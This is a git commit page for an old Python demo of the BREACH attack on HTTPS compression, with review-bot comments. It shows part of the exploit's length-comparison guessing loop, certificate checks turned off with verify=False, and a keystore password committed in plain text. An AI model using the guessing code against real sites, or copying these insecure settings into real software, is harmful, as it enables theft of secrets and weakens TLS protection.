breach-https
old python script to demo breach-https vulnerability
git clone https://9o.is/git/breach-https.git
commit 2728be826719d48a9c743ca049f964a7fe7ead39 parent b4a8539e5118c93beea458921b73041e0f83e40c Author: Jul <jul@9o.is> Date: Thu, 24 Oct 2013 09:52:10 -0400 edit for windows Diffstat:
| M | README.md | | | 11 | ++++++++++- |
| M | breach.py | | | 8 | ++++---- |
| M | server/sbt.bat | | | 4 | ++-- |
3 files changed, 16 insertions(+), 7 deletions(-)
diff --git a/README.md b/README.md @@ -17,12 +17,20 @@ then go to https://127.0.0.1:8433 -If you're on windows, run the batch file instead. +If you're on windows, run the batch file instead: + + sbt.bat run ### Step 2 Execute the Python Breach script: python breach.py + +Python module, Requests, is needed. You can install it with pip or easy_install: + pip install requests + +or + easy_install requests +\ No newline at end of file diff --git a/breach.py b/breach.py @@ -33,15 +33,15 @@ def IsCorrectGuess(currentCanary, guess): 'Accept' : '*/*', \ 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (BREACH 1.0, like Gecko) Chrome/22.0.1229.94 Safari/537.4', \ 'Connection' : 'keep-alive'} - r1 = requests.get(targetURL + currentCanary + guess + padding + "@", headers=headers) - r2 = requests.get(targetURL + currentCanary + padding + guess + "@", headers=headers) + r1 = requests.get(targetURL + currentCanary + guess + padding + "@", headers=headers, verify=False) + r2 = requests.get(targetURL + currentCanary + padding + guess + "@", headers=headers, verify=False) r1Len = len(r1.raw.data) r2Len = len(r2.raw.data) NumberOfRequests += 2 if not r1.ok or not r2.ok or math.fabs(r1Len - r2Len) > 100: - r1 = requests.get(targetURL + currentCanary + guess + padding + "@", headers=headers) - r2 = requests.get(targetURL + currentCanary + padding + guess + "@", headers=headers) + r1 = requests.get(targetURL + currentCanary + guess + padding + "@", headers=headers, verify=False) + r2 = requests.get(targetURL + currentCanary + padding + guess + "@", headers=headers, verify=False) r1Len = len(r1.raw.data) r2Len = len(r2.raw.data) NumberOfRequests += 2 diff --git a/server/sbt.bat b/server/sbt.bat 
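Review bot: `verify=False` on all four `requests.get` calls in the breach.py hunk turns off certificate and hostname validation, so the script accepts any peer that answers at `targetURL`, and nothing in the code says this is only meant for the local demo server. Because the demo server uses its own keystore, exporting that certificate and passing its path would keep the self-signed setup working while still checking the peer, e.g. `requests.get(url, headers=headers, verify="demo-server-cert.pem")` (placeholder file name; this assumes the certificate's subject matches the address used). If validation stays disabled, a comment such as `# verify=False: self-signed cert on the local demo server only` next to the first call would record the intent. The retry branch repeats the same two calls verbatim, so a small helper would keep the TLS setting in one place. `IsCorrectGuess` starts and ends outside this hunk.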
@@ -1,2 +1,2 @@
 set SCRIPT_DIR=%~dp0
-java -Dfile.encoding=UTF8 -Xms512M -Xmx950M -Xss1M -XX:+CMSClassUnloadingEnabled -XX:MaxPermSize=384M -jar "%SCRIPT_DIR%sbt-launch.jar" %*
-\ No newline at end of file
+java -Djetty.ssl.keyStore=keystore -Djetty.ssl.keyStorePassword=6dUtGYj3k68x -Dfile.encoding=UTF8 -Xms512M -Xmx950M -Xss1M -XX:+CMSClassUnloadingEnabled -XX:MaxPermSize=384M -jar "%SCRIPT_DIR%sbt-launch.jar" %*
+\ No newline at end of file
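Review bot: The new `java` line passes the keystore password as a literal `-Djetty.ssl.keyStorePassword=...` argument, which commits the secret to the repository history. Taking it from the environment, e.g. `-Djetty.ssl.keyStorePassword=%KEYSTORE_PASSWORD%` (placeholder variable name), keeps it out of version control, although it would still be visible in the process command line. The keystore shipped with this demo should be treated as public and never reused elsewhere. Separately, `-Djetty.ssl.keyStore=keystore` is a relative path, so it presumably resolves against the current directory rather than the script's; `-Djetty.ssl.keyStore="%SCRIPT_DIR%keystore"` would match how the jar path is built on the same line.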